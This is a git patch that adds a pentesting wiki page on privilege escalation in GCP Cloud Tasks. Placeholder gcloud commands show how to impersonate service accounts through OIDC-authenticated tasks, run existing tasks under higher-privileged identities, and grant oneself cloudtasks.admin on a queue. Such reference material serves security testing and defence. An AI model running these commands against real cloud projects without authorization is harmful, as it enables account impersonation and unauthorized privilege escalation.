From 4c40d0548edfcd65aa2a59a7de2a8dcdcc35134b Mon Sep 17 00:00:00 2001 From: Tsubasa Irisawa Date: Thu, 14 Aug 2025 22:19:54 +0900 Subject: [PATCH] Add GCP Cloud Tasks privesc page --- src/SUMMARY.md | 1 + .../gcp-cloudtasks-privesc.md | 51 +++++++++++++++++++ 2 files changed, 52 insertions(+) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 66a6a8fd8d..7e7cc6609b 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -107,6 +107,7 @@ - [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md) - [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md) - [GCP - Cloud Scheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md) + - [GCP - Cloud Tasks Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md) - [GCP - Compute Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md) - [GCP - Add Custom SSH Metadata](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md) - [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md) diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md new file mode 100644 index 0000000000..65bb00f104 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md @@ -0,0 +1,51 @@ +# GCP - Cloud Tasks Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Cloud Tasks + +### `cloudtasks.tasks.create`, `iam.serviceAccounts.actAs` + +An attacker with these permissions can **impersonate other service accounts** by creating tasks that execute with the specified service account's identity. This allows sending **authenticated HTTP requests to IAM-protected Cloud Run or Cloud Functions** services. + +```bash +gcloud tasks create-http-task \ + task-$(date '+%Y%m%d%H%M%S') \ + --location us-central1 \ + --queue \ + --url 'https://.us-central1.run.app' \ + --method POST \ + --header 'X-Hello: world' \ + --body-content '{"hello":"world"}' \ + --oidc-service-account-email @.iam.gserviceaccount.com +``` + +### `cloudtasks.tasks.run`, `cloudtasks.tasks.list` + +An attacker with these permissions can **run existing scheduled tasks** without having permissions on the service account associated with the task. This allows executing tasks that were previously created with higher privileged service accounts. + +```bash +gcloud tasks run projects//locations/us-central1/queues//tasks/ +``` + +The principal executing this command **doesn't need `iam.serviceAccounts.actAs` permission** on the task's service account. However, this only allows running existing tasks - it doesn't grant the ability to create or modify tasks. + +### `cloudtasks.queues.setIamPolicy` + +An attacker with this permission can **grant themselves or other principals Cloud Tasks roles** on specific queues, potentially escalating to `roles/cloudtasks.admin` which includes the ability to create and run tasks. + +```bash +gcloud tasks queues add-iam-policy-binding \ + \ + --location us-central1 \ + --member serviceAccount:@.iam.gserviceaccount.com \ + --role roles/cloudtasks.admin +``` + +This allows the attacker to grant full Cloud Tasks admin permissions on the queue to any service account they control. + +## References + +- [Google Cloud Tasks Documentation](https://cloud.google.com/tasks/docs) + +{{#include ../../../banners/hacktricks-training.md}}